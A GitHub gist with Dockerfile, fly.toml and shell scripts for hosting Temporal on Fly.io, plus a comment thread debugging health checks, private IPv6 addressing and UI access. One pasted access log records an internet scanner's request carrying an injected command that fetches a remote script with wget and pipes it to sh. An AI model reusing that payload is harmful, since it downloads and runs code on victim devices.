Skip to content

Instantly share code, notes, and snippets.

@khuezy
Last active February 22, 2025 16:52
Show Gist options
  • Save khuezy/1d396cff80158501ee01b84522790960 to your computer and use it in GitHub Desktop.
Save khuezy/1d396cff80158501ee01b84522790960 to your computer and use it in GitHub Desktop.
Temporal Fly.io

Since there were a few people asking how to setup Temporal on Fly.io, I'd thought this would be useful.

Disclaimer: I'm not a Fly nor Temporal expert (in fact I'm a big noob) so you'll have to forgive me. Any suggestions are welcome to improve these configs for others and myself.

Don't forget to add a private ip6 address: fly ips allocate-v6 --private

This is required for the ui app to connect to the server via .flycast

ARG GOPROXY
##### Temporal server with Auto-Setup #####
FROM temporalio/ui:2.27.2 as ui
FROM temporalio/server:1.24.1.0 as server
WORKDIR /etc/temporal
FROM temporalio/auto-setup:1.24.1.0 as final
COPY --from=ui --chown=temporal:temporal /home/ui-server /home/ui-server
RUN rm -rf /home/ui-server/config/*
EXPOSE 7233 8080
# Use Mysql, ES, or something else
ENV DB=postgres12
ENV DB_PORT=5432
# Move these to `fly secrets`
ENV POSTGRES_SEEDS=db.xxx.supabase.co (or w/e your db domain is)
ENV POSTGRES_USER=postgres
ENV POSTGRES_PWD=P@ssw0rd (use a better password)
ENV DBNAME=postgres
# Change Visibility to a different table. I'm using the same one at the moment b/c supabase's free tier only allows
# for 1 free table. This requires manual migration.
ENV VISIBILITY_DBNAME=postgres
ENV BIND_ON_IP=0.0.0.0
ENV TEMPORAL_BROADCAST_ADDRESS=0.0.0.0
ENV DEFAULT_NAMESPACE=default
ENV DYNAMIC_CONFIG_FILE_PATH=/etc/temporal/config/dynamicconfig/docker.yaml
# These two .sh files are defined below
COPY ./start.sh /etc/temporal/start.sh
COPY ./start-ui.sh /etc/temporal/start-ui.sh
CMD ["autosetup"]
ENTRYPOINT ["/etc/temporal/start.sh"]
app = 'my-temporal-app'
primary_region = 'sea'
[processes]
server = '/etc/temporal/entrypoint.sh autosetup'
ui = '/etc/temporal/start-ui.sh'
[[services]]
protocol = 'tcp'
internal_port = 7233
auto_stop_machines = true
auto_start_machines = true
min_machines_running = 1
processes = ['server']
[[services.ports]]
port = 7233
# handlers = ['http'] # Do not expose to public, public ipv4/6 should be removed already
# alpn h2 is needed for the grpc protocol
[services.ports.tls_options]
alpn = ['h2']
[[services.tcp_checks]]
interval = '10s'
timeout = '2s'
grace_period = '5s'
[[services]]
protocol = 'tcp'
internal_port = 8080
auto_stop_machines = true
auto_start_machines = true
min_machines_running = 0
processes = ['ui']
# Ideally, don't expose the UI to the public, keep it behind a CDN (eg Cloudflare) and whitelist the IP
# or make it public but set up SSO
[[services.ports]]
port = 8080
# handlers = ['http']
# [[services.ports]]
# port = 443
# handlers = ['tls', 'http']
[[vm]]
size = 'shared-cpu-1x'
#!/bin/sh
# The Temporal UI Server expects the script to be executed at the `/home/ui-server`
cd /home/ui-server
# Assuming your server/ui is running in the same Fly app (but different process)
# Change this to another fly app or IP if running elsewhere.
export TEMPORAL_ADDRESS="${FLY_APP_NAME}.flycast:7233"
./start-ui-server.sh
#!/bin/sh
# This is called via the fly.toml:
# [processes]
# server = "/etc/temporal/entrypoint.sh autosetup"
# ui = "/etc/temporal/start-ui.sh"
#
# This script itself is called in the Dockerfile:
# ENTRYPOINT ["/etc/temporal/start.sh"]
exec "$@"
@khuezy
Copy link
Author

khuezy commented Oct 7, 2024

I believe they still work (I'm using the same setup right now). What issues are you having?

@demisx
Copy link

demisx commented Oct 7, 2024

It's mostly with the healthcheck. It keeps on failing during application deployment, but I am not clear what's preventing the service on :7233 from running. This what I see in the log:

2024-10-07T22:05:43Z runner[d8d9222f193538] iad [info]Configuring firecracker
2024-10-07T22:05:43Z app[d8d9222f193538] iad [info]2024-10-07T22:05:43.590977902 [01J9MG890MJW4Z3H1VREM10YM9:main] Running Firecracker v1.7.0
2024-10-07T22:05:43Z app[d8d9222f193538] iad [info][    0.319302] PCI: Fatal: No config space access function found
2024-10-07T22:05:44Z health[d8d9222f193538] iad [warn]Health check on port 7233 is in a 'warning' state. Your app may not be responding properly. Services exposed on ports [7233] may have intermittent failures until the health check passes.
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO Starting init (commit: 04656915)...
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO Preparing to run: `/etc/temporal/start.sh /etc/temporal/entrypoint.sh autosetup` as temporal
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO [fly api proxy] listening at /.fly/api
2024-10-07T22:05:44Z runner[d8d9222f193538] iad [info]Machine created and started in 12.644s
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config; env=docker,configDir=config
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config files=[config/docker.yaml]
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config; env=docker,configDir=config
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config files=[config/docker.yaml]
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]   ____    __
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]  / __/___/ /  ___
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] / _// __/ _ \/ _ \
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]/___/\__/_//_/\___/ v4.9.0
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]High performance, minimalist Go web framework
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]https://echo.labstack.com
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]____________________________________O/_______
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]                                    O\
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]⇨ http server started on [::]:8080
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 INFO SSH listening listen_address=[fdaa:9:ab23:a7b:1db:739a:cb8:2]:22 dns_server=[fdaa::3]:53
2024-10-07T22:05:47Z health[d8d9222f193538] iad [error]Health check on port 7233 has failed. Your app is not responding properly. Services exposed on ports [7233] will have intermittent failures until the health check passes.

Any suggestion will be highly appreciated.

@khuezy
Copy link
Author

khuezy commented Oct 7, 2024

It might be due to resource constraints? What are your memory size? I'm using 256MB base and I have swap_size_mb = 512 for my dev/staging instance. I think those are the minimum values.

@demisx
Copy link

demisx commented Oct 7, 2024

I have this in the app fly.toml file. Or do I need to configure it somewere else?

[[vm]]
  size = 'shared-cpu-1x'
  memory = '1gb'

@khuezy
Copy link
Author

khuezy commented Oct 7, 2024

That should be plenty. Do you not have any other errors in the log?

@khuezy
Copy link
Author

khuezy commented Oct 7, 2024

The "ECHO" ascii is coming from the ui process, so I think it doesn't have the proper bridge to your server.
Do: fly ips list and see if you have a private v6 address. If you don't create one fly ips allocate-v6 --private

@demisx
Copy link

demisx commented Oct 7, 2024

That should be plenty. Do you not have any other errors in the log?

Hmm... That's all I see when I run fly logs -a <app-name>. Is there another log that I am missing maybe?

The "ECHO" ascii is coming from the ui process, so I think it doesn't have the proper bridge to your server.
Do: fly ips list and see if you have a private v6 address. If you don't create one fly ips allocate-v6 --private

There was no private v6 address. So, I did add it manually like you said. Is this something that I am missing in fly.toml config maybe? Wondering why it's not being created during the launch/deploy phase. Anyway, after adding the private IP, I saw some activity like this in the app log:

2024-10-07T23:22:13Z proxy[4d89602be479d8] iad [info]machine became reachable in 89.097093ms
2024-10-07T23:22:13Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:22:13.019185599Z","id":"","remote_ip":"172.16.1.210","host":"google.com:443","method":"CONNECT","uri":"google.com:443","user_agent":"Go-http-client/1.1","status":400,"error":"code=400, message=missing csrf token in request header","latency":1333240,"latency_human":"1.33324ms","bytes_in":0,"bytes_out":51}
2024-10-07T23:24:00Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:24:00.98877547Z","id":"","remote_ip":"172.16.1.210","host":"169.155.60.169:8080","method":"GET","uri":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)","user_agent":"Go-http-client/1.1","status":200,"error":"","latency":327930,"latency_human":"327.93µs","bytes_in":0,"bytes_out":1247}
2024-10-07T23:24:01Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:24:01.152913024Z","id":"","remote_ip":"172.16.1.210","host":"169.155.60.169:8080","method":"GET","uri":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)","user_agent":"Go-http-client/1.1","status":200,"error":"","latency":67870,"latency_human":"67.87µs","bytes_in":0,"bytes_out":1247}
2024-10-07T23:27:21Z proxy[4d89602be479d8] iad [info]App [app-name] has excess capacity, autostopping machine 4d89602be479d8. 0 out of 1 machines left running (region=iad, process group=ui)

But I don't see healthchecks passing still. These are the machines created:

Screenshot 2024-10-07 at 4 38 26 PM

@khuezy
Copy link
Author

khuezy commented Oct 7, 2024

That looks good now. Your server should be running 24/7 (you may want to process.exit(0) after your worker finishes and use the machine API to wake it up to save money).
The ui apps will auto shutdown, which is what has excess capacity, autostopping machine is saying.

The healthchecks are good now right? I see the green dot.

@demisx
Copy link

demisx commented Oct 8, 2024

Thank you! The ui machines went to sleep, but there is only one server machine and it still shows 0/1 healthchecks passing for some reason (3rd column in the image above). Wondering if I should try to re-deploy this app again...

Is creating private IP a manual step that needs to be done after each new deployment? This is my first time working with Fly.io.

@khuezy
Copy link
Author

khuezy commented Oct 8, 2024

When you launch a new app you can pass --flycast for it to automatically assign the private ip6. Once an app is launched, you don't need to create ips on deploy or scaling up.
Regarding the failed health check, you'll need to filter by the server process to see what the error is. I'm guessing it's DB related.

@demisx
Copy link

demisx commented Oct 8, 2024

I've tried --flycast option with fly launch, but nothing happened. I had to move it to fly deploy for the IP address to be assigned. Still getting health check error. I'll be working on figuring out how to filter by the server process like you mentioned, because there is not much useful info in the log that could point to the source of error.

This is how I currently launch this app. Maybe you'll see anything missing. Thank you very much again. You've been a tremendous help.

  1. Create app in Fly.io

    fly launch --config apps/worker/fly.dev.toml --dockerfile Dockerfile.remote --build-only
    ---
    ? Would you like to copy its configuration to the new app? Yes
    ? Do you want to tweak these settings before proceeding? No
  2. Set secrets

    # In Fish
    bash -c 'fly secrets set --config apps/worker/fly.dev.toml \
      DATABASE_URL=postgres://postgres:[db-password]@[db-app-name].internal:5432 \
      POSTGRES_USER=postgres \
      POSTGRES_PASSWORD=[db-password]'
  3. Deploy app to Fly.io

    fly deploy --config apps/worker/fly.dev.toml --flycast

@khuezy
Copy link
Author

khuezy commented Oct 8, 2024

For step 2, I don't think those are the correct env variables for temporal. It should be:

ENV POSTGRES_SEEDS=db.xxx.supabase.co (or w/e your db domain is)
ENV POSTGRES_USER=postgres
ENV POSTGRES_PWD=P@ssw0rd (use a better password)
ENV DBNAME=postgres
ENV VISIBILITY_DBNAME=postgres // change this to a different table.

There isn't DATABASE_URL, and that should only contain [db-app-name].flycast:5432

For step 3, you don't need to pass in --flycast. You only need to set that up when you launch your app for the first time.

@demisx
Copy link

demisx commented Oct 8, 2024

For step 3, you don't need to pass in --flycast. You only need to set that up when you launch your app for the first time.

For me it works only when I add --flycast flag to fly deploy. Maybe because my fly launch uses the --build-only flag?

Regarding the failed health check, you'll need to filter by the server process to see what the error is. I'm guessing it's DB related.

Where would I find the log that would allow me to see the DB connection errors? When I do fly logs -a [app-name] I only see the error related to the failed health check, nothing more on what could actually cause this check to fail.

@khuezy
Copy link
Author

khuezy commented Oct 8, 2024

you should be able to see the entire logs. If you're not seeing anything useful, try adding TEMPORAL_DEBUG=true to your env variable.
I'm not sure what the actual flag is so that might be wrong.
EDIT: LOG_LEVEL = 'debug'

@demisx
Copy link

demisx commented Oct 9, 2024

Just in case this helps others. Adding TEMPORAL_DEBUG=true env var didn't make any difference, but LOG_LEVEL = 'debug' (in fly.toml) made debug level messages show up. I've also had to comment out ENV VISIBILITY_DBNAME=postgres, so default temporal_visibility database is created. Without it, I was missing some visibility tables in the postgres DB.

I have successfully started the server app (@khuezy you rock!). I've verified that the schema got provisioned in DB too. Just trying to figure out how to access UI at this point. I've assigned public IP to the app, but nothing comes up. I am sure it's me missing something. This is what I get:

# Verify public IP assigned
$ dig +short [app-name].fly.dev
137.x.x.x

# Try to access the app
$ curl -Iv https://[app-name].fly.dev
* Could not resolve host: [app-name].fly.dev
* Closing connection
curl: (6) Could not resolve host: [app-name].fly.dev

@khuezy
Copy link
Author

khuezy commented Oct 9, 2024

Nice! Glad you got the server figured out. For the UI... the example above intentionally does not expose the ui app publicly, as that would be a bad idea. What you should do is create an nginx app that proxies to the ui app via .flycast via server name, eg tempralui.example.com.
Then the entry point to that address would be via CDN (Cloudflare) protected by IP whitelist. Or you can basic-auth protect it directly in your nginx config.

@demisx
Copy link

demisx commented Oct 9, 2024

Got it! Yes, I've gone through your fly.toml and noticed those commented out lines. Once I've enabled these, the UI started to show up:

[[services.ports]]
    port = 80
    handlers = ['http']

[[services.ports]]
  port = 443
  handlers = ['tls', 'http']

I am going to comment out these lines again per your advice. I agree this UI should be protected for authorized access only.

@demisx
Copy link

demisx commented Oct 10, 2024

Also, an alternative and much easier way to access UI is just forward remote port to localhost.

  1. Forward port in a separate terminal
    fly proxy 8080 -a [temporal-server-app-name]
  2. Access UI at http://localhost:8080/

@khuezy
Copy link
Author

khuezy commented Oct 10, 2024

👍 Yup that's the simplest way if you don't need remote access.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment